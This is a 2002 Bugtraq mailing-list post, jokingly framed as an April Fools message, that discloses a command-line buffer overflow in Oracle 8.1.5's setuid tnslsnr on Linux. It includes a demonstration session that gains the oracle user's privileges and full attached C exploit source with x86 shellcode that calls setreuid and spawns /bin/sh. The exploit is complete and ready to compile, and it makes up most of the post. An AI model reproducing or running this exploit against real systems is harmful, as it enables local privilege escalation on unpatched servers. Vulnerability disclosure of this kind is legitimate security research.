From dotslash@snosoft.com Wed Apr 3 12:34:07 2002 Date: Mon, 01 Apr 2002 10:22:43 -0500 From: KF To: bugtraq , vuln-dev , recon@snosoft.com Subject: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr) This is ment to be an April fools joke but if you still use old Oracle its not to funny I guess: After I ate a few too many hard boiled eggs this weekend I decided to install Oracle and play with it a little. Being poor I didn't have 800 bones to shell out on Oracle 16i so I had to settle with oldschool Oracle 8i from this little mom and pop shop on my corner. They just happened to have a copy that would run on linux and it was only 50 bucks so I bought it! After the install no more than 10 minutes later I found an issue... I figured that most anything I would have found would already be public knowlege or it was patched up somewhere along the way to the current product version. Well from what I can tell this is an unknown issue. TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53 [itchie@ghetto itchie]$ ls -al /home/u01/app/oracle/product/8.1.5/bin/tnslsnr -rwsr-s--x 1 oracle oracle 4399723 Jun 11 1999 /home/u01/app/oracle/product/8.1.5/bin/tnslsnr There were holes reported on the abuse of $ORACLE_HOME.... http://online.securityfocus.com/archive/1/140704 which tnslsnr had issues with but these appeared patched on this install so I didn't bother trying to use env variables as abuse [dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'` [dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr (no result...exit normally) The first thing abnormal I tried hit right on the money... simple cmdline b0f [dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr `perl -e 'print "A" x 9000'` Segmentation fault Of course I had to give one of my developers a quick ring and try to harass him to stop molesting the eater bunny and take a second to code me up an exploit. Much obliged "The Itch" took about 10 minutes (literally) to come up with the following... Happy Easter! and April Fools?! [itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c [itchie@ghetto tmp]$ id uid=507(itchie) gid=507(itchie) groups=507(itchie) [itchie@ghetto tmp]$ ./tnslsnrx Oracle tnslsrn 8.1.5 Vulnerability found by KF / http://www.snosoft.com Coded by The Itch / http://www.promisc.org Using return address: 0xbffffaf4 Using buffersize : 2132 sh-2.05$ id uid=515(oracle) gid=507(itchie) groups=507(itchie) -KF [ Part 2: "Attached Text" ] /* * Yet another exploit for the 'Unbreakable' Oracle database * The vulnerability was found by KF / Snosoft (http://www.snosoft.com) * Shellcode created by r0z / Promisc * Exploit coded up by The Itch / Promisc (http://www.promisc.org) * * This exploit was developed on the Snosoft vulnerability research machines * mail dotslash@snosoft.com if you wish to participate in vuln research. * * - The Itch * - itchie@promisc.org * * - Technical details concerning the exploit - * * 1). Buffer overflow occurs after writing more then 2132 bytes into the * buffer at the command line 2128 to overwrite ebp, 2132 to * overwrite eip). * 2). If you write more then 2132 bytes, other frames will be * overwritten afterwards and will mess up your flow of arbitrary code * execution. (It must be exactly 2132 bytes!) * 3). shellcode will try to do a setreuid(515); */ #include #include #define DEFAULT_EGG_SIZE 4096 #define NOP 0x90 /* 2132 + 1 for the \0 at the end of the string */ #define DEFAULT_BUFFER_SIZE 2133 /* Shellcode made by r0z (r0z@promisc.org) */ char shellcode[] = "\x31\xdb" /* xor %ebx, %ebx */ "\x31\xc9" /* xor %ecx, %ecx */ "\xf7\xe3" /* mul %ebx */ "\xb0\x46" /* mov $0x46, %al */ "\x66\xbb\x03\x02" /* mov $0x1fc, %bx */ "\x49" /* dec %ecx */ "\xcd\x80" /* int $0x80 */ "\x31\xd2" /* xor %edx, %edx */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* mov %esp, %ebx */ "\x52" /* push %edx */ "\x53" /* push %ebx */ "\x89\xe1" /* mov %esp, %ecx */ "\x6a\x0b" /* pushl $0xb */ "\x58" /* pop %eax */ "\xcd\x80"; /* int $0x80 */ int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; int get_sp = (int)&get_sp; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } printf("Oracle tnslsrn 8.1.5\n"); printf("Vulnerability found by KF / http://www.snosoft.com\n"); printf("Coded by The Itch / http://www.promisc.org\n\n"); printf("Using return address: 0x%x\n", get_sp); printf("Using buffersize : %d\n", bsize - 1); ptr = buff; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode)-1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); buff[bsize - 1 ]= '\0'; execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr", "tnslsnr", buff, 0); return 0; }